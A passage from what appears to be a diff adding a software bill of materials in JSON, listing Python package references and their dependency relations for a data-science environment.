"pkg:pypi/pkginfo@latest", + "pkg:pypi/platformdirs@latest", + "pkg:pypi/plotly@latest", + "pkg:pypi/pluggy@latest", + "pkg:pypi/ply@3.11", + "pkg:pypi/poyo@latest", + "pkg:pypi/prometheus-client@latest", + "pkg:pypi/prompt-toolkit@latest", + "pkg:pypi/psutil@latest", + "pkg:pypi/ptyprocess@latest", + "pkg:pypi/pure-eval@latest", + "pkg:pypi/py-cpuinfo@latest", + "pkg:pypi/pyarrow@11.0.0", + "pkg:pypi/pyasn1-modules@0.2.8", + "pkg:pypi/pyasn1@latest", + "pkg:pypi/pycodestyle@latest", + "pkg:pypi/pycosat@latest", + "pkg:pypi/pycparser@latest", + "pkg:pypi/pyct@latest", + "pkg:pypi/pycurl@latest", + "pkg:pypi/pydocstyle@latest", + "pkg:pypi/pyerfa@latest", + "pkg:pypi/pyflakes@latest", + "pkg:pypi/pylint-venv@latest", + "pkg:pypi/pylint@latest", + "pkg:pypi/pyls-spyder@0.4.0", + "pkg:pypi/pyodbc@latest", + "pkg:pypi/pyparsing@latest", + "pkg:pypi/pyqt5-sip@12.11.0", + "pkg:pypi/pyrsistent@latest", + "pkg:pypi/pysocks@latest", + "pkg:pypi/pytest@latest", + "pkg:pypi/python-json-logger@latest", + "pkg:pypi/python-lsp-black@latest", + "pkg:pypi/python-lsp-jsonrpc@1.0.0", + "pkg:pypi/python-lsp-server@latest", + "pkg:pypi/python-slugify@latest", + "pkg:pypi/python-snappy@latest", + "pkg:pypi/pytoolconfig@latest", + "pkg:pypi/pyviz-comms@latest", + "pkg:pypi/pywavelets@latest", + "pkg:pypi/pyxdg@latest", + "pkg:pypi/pyzmq@latest", + "pkg:pypi/qdarkstyle@latest", + "pkg:pypi/qstylizer@latest", + "pkg:pypi/qtawesome@latest", + "pkg:pypi/qtconsole@latest", + "pkg:pypi/regex@latest", + "pkg:pypi/requests-file@latest", + "pkg:pypi/requests-toolbelt@latest", + "pkg:pypi/responses@latest", + "pkg:pypi/rfc3339-validator@latest", + "pkg:pypi/rfc3986-validator@latest", + "pkg:pypi/rope@latest", + "pkg:pypi/rtree@latest", + "pkg:pypi/ruamel-yaml-conda@latest", + "pkg:pypi/ruamel.yaml@latest", + "pkg:pypi/s3fs@latest", + "pkg:pypi/safetensors@latest", + "pkg:pypi/scikit-image@latest", + "pkg:pypi/scikit-learn-intelex@20230426.111612", + "pkg:pypi/scikit-learn@latest", + "pkg:pypi/scipy@latest", + "pkg:pypi/scrapy@latest", + "pkg:pypi/seaborn@latest", + "pkg:pypi/secretstorage@latest", + "pkg:pypi/send2trash@latest", + "pkg:pypi/sip@latest", + "pkg:pypi/smart-open@latest", + "pkg:pypi/sniffio@latest", + "pkg:pypi/sortedcontainers@latest", + "pkg:pypi/soupsieve@latest", + "pkg:pypi/sphinx@latest", + "pkg:pypi/spyder-kernels@latest", + "pkg:pypi/spyder@latest", + "pkg:pypi/sqlalchemy@latest", + "pkg:pypi/stack-data@latest", + "pkg:pypi/statsmodels@latest", + "pkg:pypi/sympy@latest", + "pkg:pypi/tables@latest", + "pkg:pypi/tabulate@latest", + "pkg:pypi/tbb@0.2", + "pkg:pypi/tblib@latest", + "pkg:pypi/tenacity@latest", + "pkg:pypi/terminado@latest", + "pkg:pypi/text-unidecode@latest", + "pkg:pypi/textdistance@latest", + "pkg:pypi/threadpoolctl@latest", + "pkg:pypi/three-merge@latest", + "pkg:pypi/tifffile@latest", + "pkg:pypi/tinycss2@latest", + "pkg:pypi/tokenizers@latest", + "pkg:pypi/toml@latest", + "pkg:pypi/tomlkit@latest", + "pkg:pypi/toolz@latest", + "pkg:pypi/tornado@latest", + "pkg:pypi/tqdm@latest", + "pkg:pypi/traitlets@latest", + "pkg:pypi/transformers@latest", + "pkg:pypi/typing-extensions@latest", + "pkg:pypi/tzdata@latest", + "pkg:pypi/uc-micro-py@latest", + "pkg:pypi/ujson@latest", + "pkg:pypi/unidecode@latest", + "pkg:pypi/urllib3@1.23", + "pkg:pypi/watchdog@latest", + "pkg:pypi/wcwidth@latest", + "pkg:pypi/webencodings@0.5.1", + "pkg:pypi/websocket-client@latest", + "pkg:pypi/werkzeug@3.0.3", + "pkg:pypi/whatthepatch@latest", + "pkg:pypi/widgetsnbextension@latest", + "pkg:pypi/wurlitzer@latest", + "pkg:pypi/xarray@latest", + "pkg:pypi/xxhash@latest", + "pkg:pypi/xyzservices@latest", + "pkg:pypi/y-py@latest", + "pkg:pypi/yapf@latest", + "pkg:pypi/yarl@latest", + "pkg:pypi/ypy-websocket@latest", + "pkg:pypi/zict@latest", + "pkg:pypi/zipp@latest", + "pkg:pypi/zstandard@latest" + ] + }, + { + "ref": "pkg:pypi/numpy@1.24.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/bottleneck@latest", + "dependsOn": [ + "pkg:pypi/numpy@1.24.3" + ] + }, + { + "ref": "pkg:pypi/heapdict@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/markdown@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pillow@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyqt5-sip@12.11.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pysocks@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pywavelets@latest", + "dependsOn": [ + "pkg:pypi/numpy@1.24.3" + ] + }, + { + "ref": "pkg:pypi/qtpy@2.2.0", + "dependsOn": [ + "pkg:pypi/packaging@23.1" + ] + }, + { + "ref": "pkg:pypi/packaging@23.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/qdarkstyle@latest", + "dependsOn": [ + "pkg:pypi/qtpy@2.2.0" + ] + }, + { + "ref": "pkg:pypi/qtawesome@latest", + "dependsOn": [ + "pkg:pypi/qtpy@2.2.0" + ] + }, + { + "ref": "pkg:pypi/rtree@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/greenlet@2.0.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sqlalchemy@latest", + "dependsOn": [ + "pkg:pypi/greenlet@2.0.1" + ] + }, + { + "ref": "pkg:pypi/twisted@22.10.0", + "dependsOn": [ + "pkg:pypi/attrs@22.1.0", + "pkg:pypi/automat@20.2.0", + "pkg:pypi/constantly@15.1.0", + "pkg:pypi/hyperlink@21.0.0", + "pkg:pypi/incremental@21.3.0", + "pkg:pypi/typing-extensions@4.7.1", + "pkg:pypi/zope.interface@5.4.0" + ] + }, + { + "ref": "pkg:pypi/zope.interface@5.4.0", + "dependsOn": [ + "pkg:pypi/setuptools@68.0.0" + ] + }, + { + "ref": "pkg:pypi/setuptools@68.0.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/constantly@15.1.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/incremental@21.3.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/automat@20.2.0", + "dependsOn": [ + "pkg:pypi/attrs@22.1.0", + "pkg:pypi/six@1.16.0" + ] + }, + { + "ref": "pkg:pypi/attrs@22.1.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/six@1.16.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/hyperlink@21.0.0", + "dependsOn": [ + "pkg:pypi/idna@2.7" + ] + }, + { + "ref": "pkg:pypi/idna@2.7", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/typing-extensions@4.7.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cryptography@3.3.2", + "dependsOn": [ + "pkg:pypi/cffi@1.15.1", + "pkg:pypi/six@1.16.0" + ] + }, + { + "ref": "pkg:pypi/cffi@1.15.1", + "dependsOn": [ + "pkg:pypi/pycparser@2.21" + ] + }, + { + "ref": "pkg:pypi/pycparser@2.21", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cssselect@1.1.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/itemloaders@1.0.4", + "dependsOn": [ + "pkg:pypi/itemadapter@0.3.0", + "pkg:pypi/jmespath@0.10.0", + "pkg:pypi/parsel@1.6.0", + "pkg:pypi/w3lib@1.21.0" + ] + }, + { + "ref": "pkg:pypi/w3lib@1.21.0", + "dependsOn": [ + "pkg:pypi/six@1.16.0" + ] + }, + { + "ref": "pkg:pypi/parsel@1.6.0", + "dependsOn": [ + "pkg:pypi/lxml@4.9.3", + "pkg:pypi/w3lib@1.21.0" + ] + }, + { + "ref": "pkg:pypi/lxml@4.9.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jmespath@0.10.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/itemadapter@0.3.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyopenssl@23.2.0", + "dependsOn": [ + "pkg:pypi/cryptography@3.3.2" + ] + }, + { + "ref": "pkg:pypi/queuelib@1.5.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/service-identity@18.1.0", + "dependsOn": [ + "pkg:pypi/attrs@22.1.0", + "pkg:pypi/cryptography@3.3.2", + "pkg:pypi/pyasn1-modules@0.2.8", + "pkg:pypi/pyasn1@0.4.8" + ] + }, + { + "ref": "pkg:pypi/pyasn1-modules@0.2.8", + "dependsOn": [ + "pkg:pypi/pyasn1@0.4.8" + ] + }, + { + "ref": "pkg:pypi/pyasn1@0.4.8", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/protego@0.1.16", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tldextract@3.2.0", + "dependsOn": [ + "pkg:pypi/filelock@3.9.0", + "pkg:pypi/idna@2.7", + "pkg:pypi/requests-file@1.5.1", + "pkg:pypi/requests@2.19.1" + ] + }, + { + "ref": "pkg:pypi/requests@2.19.1", + "dependsOn": [ + "pkg:pypi/certifi@2023.7.22", + "pkg:pypi/chardet@3.0.4", + "pkg:pypi/idna@2.7", + "pkg:pypi/urllib3@1.23" + ] + }, + { + "ref": "pkg:pypi/chardet@3.0.4", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/urllib3@1.23", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/certifi@2023.7.22", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/requests-file@1.5.1", + "dependsOn": [ + "pkg:pypi/requests@2.19.1" + ] + }, + { + "ref": "pkg:pypi/filelock@3.9.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pydispatcher@2.0.5", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/scrapy@latest", + "dependsOn": [ + "pkg:pypi/cryptography@3.3.2", + "pkg:pypi/cssselect@1.1.0", + "pkg:pypi/itemadapter@0.3.0", + "pkg:pypi/itemloaders@1.0.4", + "pkg:pypi/lxml@4.9.3", + "pkg:pypi/packaging@23.1", + "pkg:pypi/parsel@1.6.0", + "pkg:pypi/protego@0.1.16", + "pkg:pypi/pydispatcher@2.0.5", + "pkg:pypi/pyopenssl@23.2.0", + "pkg:pypi/queuelib@1.5.0", + "pkg:pypi/service-identity@18.1.0", + "pkg:pypi/setuptools@68.0.0", + "pkg:pypi/tldextract@3.2.0", + "pkg:pypi/twisted@22.10.0", + "pkg:pypi/w3lib@1.21.0", + "pkg:pypi/zope.interface@5.4.0" + ] + }, + { + "ref": "pkg:pypi/jeepney@0.7.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/secretstorage@latest", + "dependsOn": [ + "pkg:pypi/cryptography@3.3.2", + "pkg:pypi/jeepney@0.7.1" + ] + }, + { + "ref": "pkg:pypi/send2trash@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinxcontrib-applehelp@1.0.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinxcontrib-devhelp@1.0.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinxcontrib-jsmath@1.0.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinxcontrib-htmlhelp@2.0.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinxcontrib-serializinghtml@1.1.5", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinxcontrib-qthelp@1.0.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jinja2@3.1.2", + "dependsOn": [ + "pkg:pypi/markupsafe@2.1.1" + ] + }, + { + "ref": "pkg:pypi/markupsafe@2.1.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pygments@2.15.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/docutils@0.18.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/snowballstemmer@2.2.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/babel@2.11.0", + "dependsOn": [ + "pkg:pypi/pytz@2023.3.post1" + ] + }, + { + "ref": "pkg:pypi/pytz@2023.3.post1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/alabaster@0.7.12", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/imagesize@1.4.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sphinx@latest", + "dependsOn": [ + "pkg:pypi/alabaster@0.7.12", + "pkg:pypi/babel@2.11.0", + "pkg:pypi/docutils@0.18.1", + "pkg:pypi/imagesize@1.4.1", + "pkg:pypi/jinja2@3.1.2", + "pkg:pypi/packaging@23.1", + "pkg:pypi/pygments@2.15.1", + "pkg:pypi/requests@2.19.1", + "pkg:pypi/snowballstemmer@2.2.0", + "pkg:pypi/sphinxcontrib-applehelp@1.0.2", + "pkg:pypi/sphinxcontrib-devhelp@1.0.2", + "pkg:pypi/sphinxcontrib-htmlhelp@2.0.0", + "pkg:pypi/sphinxcontrib-jsmath@1.0.1", + "pkg:pypi/sphinxcontrib-qthelp@1.0.3", + "pkg:pypi/sphinxcontrib-serializinghtml@1.1.5" + ] + }, + { + "ref": "pkg:pypi/tbb@0.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/unidecode@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/botocore@1.29.76", + "dependsOn": [ + "pkg:pypi/jmespath@0.10.0", + "pkg:pypi/python-dateutil@2.8.2", + "pkg:pypi/urllib3@1.23" + ] + }, + { + "ref": "pkg:pypi/python-dateutil@2.8.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/aiohttp@3.8.5", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/wrapt@1.14.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/aioitertools@0.7.1", + "dependsOn": [ + "pkg:pypi/typing-extensions@4.7.1" + ] + }, + { + "ref": "pkg:pypi/aiobotocore@latest", + "dependsOn": [ + "pkg:pypi/aiohttp@3.8.5", + "pkg:pypi/aioitertools@0.7.1", + "pkg:pypi/botocore@1.29.76", + "pkg:pypi/wrapt@1.14.1" + ] + }, + { + "ref": "pkg:pypi/aiofiles@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/frozenlist@1.3.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/aiosignal@latest", + "dependsOn": [ + "pkg:pypi/frozenlist@1.3.3" + ] + }, + { + "ref": "pkg:pypi/aiosqlite@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda@23.7.4", + "dependsOn": [ + "pkg:pypi/boltons@23.0.0", + "pkg:pypi/conda-package-handling@2.2.0", + "pkg:pypi/jsonpatch@1.32", + "pkg:pypi/packaging@23.1", + "pkg:pypi/pluggy@1.0.0", + "pkg:pypi/pycosat@0.6.4", + "pkg:pypi/pyopenssl@23.2.0", + "pkg:pypi/requests@2.19.1", + "pkg:pypi/setuptools@68.0.0", + "pkg:pypi/toolz@0.12.0", + "pkg:pypi/tqdm@4.65.0" + ] + }, + { + "ref": "pkg:pypi/boltons@23.0.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-package-handling@2.2.0", + "dependsOn": [ + "pkg:pypi/conda-package-streaming@0.9.0" + ] + }, + { + "ref": "pkg:pypi/conda-package-streaming@0.9.0", + "dependsOn": [ + "pkg:pypi/requests@2.19.1", + "pkg:pypi/zstandard@0.19.0" + ] + }, + { + "ref": "pkg:pypi/zstandard@0.19.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jsonpatch@1.32", + "dependsOn": [ + "pkg:pypi/jsonpointer@2.1" + ] + }, + { + "ref": "pkg:pypi/jsonpointer@2.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pluggy@1.0.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pycosat@0.6.4", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/toolz@0.12.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tqdm@4.65.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/anaconda-anon-usage@latest", + "dependsOn": [ + "pkg:pypi/conda@23.7.4" + ] + }, + { + "ref": "pkg:pypi/intake@0.6.8", + "dependsOn": [ + "pkg:pypi/appdirs@1.4.4", + "pkg:pypi/dask@2023.6.0", + "pkg:pypi/entrypoints@0.4", + "pkg:pypi/fsspec@2023.4.0", + "pkg:pypi/jinja2@3.1.2", + "pkg:pypi/msgpack@1.0.3", + "pkg:pypi/pyyaml@6.0", + "pkg:pypi/requests@2.19.1" + ] + }, + { + "ref": "pkg:pypi/appdirs@1.4.4", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/dask@2023.6.0", + "dependsOn": [ + "pkg:pypi/click@8.1.7", + "pkg:pypi/cloudpickle@2.2.1", + "pkg:pypi/fsspec@2023.4.0" + ] + }, + { + "ref": "pkg:pypi/click@8.1.7", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cloudpickle@2.2.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/fsspec@2023.4.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/entrypoints@0.4", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/msgpack@1.0.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyyaml@6.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/anaconda-catalogs@latest", + "dependsOn": [ + "pkg:pypi/aiohttp@3.8.5", + "pkg:pypi/intake@0.6.8" + ] + }, + { + "ref": "pkg:pypi/keyring@23.13.1", + "dependsOn": [ + "pkg:pypi/importlib-metadata@6.0.0", + "pkg:pypi/jaraco.classes@3.2.1", + "pkg:pypi/jeepney@0.7.1", + "pkg:pypi/secretstorage@3.3.1" + ] + }, + { + "ref": "pkg:pypi/jaraco.classes@3.2.1", + "dependsOn": [ + "pkg:pypi/more-itertools@8.12.0" + ] + }, + { + "ref": "pkg:pypi/more-itertools@8.12.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/importlib-metadata@6.0.0", + "dependsOn": [ + "pkg:pypi/zipp@3.11.0" + ] + }, + { + "ref": "pkg:pypi/zipp@3.11.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/secretstorage@3.3.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pkce@1.0.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pydantic@1.10.8", + "dependsOn": [ + "pkg:pypi/typing-extensions@4.7.1" + ] + }, + { + "ref": "pkg:pypi/pyjwt@2.4.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-dotenv@0.21.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/anaconda-cloud-auth@latest", + "dependsOn": [ + "pkg:pypi/cryptography@3.3.2", + "pkg:pypi/keyring@23.13.1", + "pkg:pypi/pkce@1.0.3", + "pkg:pypi/pydantic@1.10.8", + "pkg:pypi/pyjwt@2.4.0", + "pkg:pypi/python-dotenv@0.21.0" + ] + }, + { + "ref": "pkg:pypi/anaconda-navigator@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/anaconda-client@1.12.1", + "dependsOn": [ + "pkg:pypi/clyent@1.2.2", + "pkg:pypi/conda-package-handling@2.2.0", + "pkg:pypi/defusedxml@0.7.1", + "pkg:pypi/nbformat@5.9.2", + "pkg:pypi/python-dateutil@2.8.2", + "pkg:pypi/pytz@2023.3.post1", + "pkg:pypi/pyyaml@6.0" + ] + }, + { + "ref": "pkg:pypi/clyent@1.2.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/defusedxml@0.7.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/nbformat@5.9.2", + "dependsOn": [ + "pkg:pypi/fastjsonschema@2.16.2", + "pkg:pypi/jsonschema@4.17.3", + "pkg:pypi/jupyter-core@5.3.0", + "pkg:pypi/traitlets@5.7.1" + ] + }, + { + "ref": "pkg:pypi/fastjsonschema@2.16.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jsonschema@4.17.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-core@5.3.0", + "dependsOn": [ + "pkg:pypi/platformdirs@3.10.0", + "pkg:pypi/traitlets@5.7.1" + ] + }, + { + "ref": "pkg:pypi/platformdirs@3.10.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/traitlets@5.7.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-pack@0.6.0", + "dependsOn": [ + "pkg:pypi/setuptools@68.0.0" + ] + }, + { + "ref": "pkg:pypi/anaconda-project@latest", + "dependsOn": [ + "pkg:pypi/anaconda-client@1.12.1", + "pkg:pypi/conda-pack@0.6.0" + ] + }, + { + "ref": "pkg:pypi/anyio@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/argon2-cffi@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/argon2-cffi-bindings@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/arrow@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/astroid@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/astropy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/asttokens@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/async-timeout@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/atomicwrites@1.4.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/autopep8@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/backcall@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/backports.functools-lru-cache@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/backports.tempfile@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/backports.weakref@1.0.post1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/bcrypt@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/beautifulsoup4@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/binaryornot@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/black@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/bleach@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/blinker@1.8.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/bokeh@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/boltons@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/brotlipy@0.7.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/certifi@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cffi@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/charset-normalizer@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cloudpickle@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/colorama@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/colorcet@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/comm@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-build@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-content-trust@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-index@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-libmamba-solver@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-package-streaming@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-repo-cli@1.0.75", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-token@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/conda-verify@3.4.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/contourpy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cookiecutter@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cycler@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/cytoolz@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/daal4py@2023.1.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/dask@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/datasets@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/datashader@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/datashape@0.5.4", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/debugpy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/decorator@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/diff-match-patch@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/dill@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/distributed@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/docstring-to-markdown@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/entrypoints@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/et-xmlfile@1.1.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/executing@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/fastjsonschema@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/filelock@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/flake8@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/flask@3.0.2", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/fonttools@4.25.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/fsspec@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/future@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/gensim@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/glob2@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/gmpy2@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/h5py@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/holoviews@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/huggingface-hub@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/hvplot@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/imagecodecs@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/imageio@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/imbalanced-learn@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/importlib-metadata@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/inflection@0.5.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/iniconfig@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/intervaltree@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ipykernel@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ipython@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ipython-genutils@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ipywidgets@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/isort@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/itsdangerous@2.2.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jaraco.classes@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jedi@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jellyfish@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jinja2-time@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jmespath@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/joblib@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/json5@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jsonpatch@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jsonschema@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-client@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-console@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-core@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-events@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-server@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-server-fileid@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-server-ydoc@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyter-ydoc@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyterlab@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyterlab-pygments@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyterlab-server@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/jupyterlab-widgets@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/kaleido@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/kiwisolver@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/lazy-loader@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/lazy-object-proxy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/libarchive-c@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/libmambapy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/linkify-it-py@latest", + "dependsOn": [] + }, + { 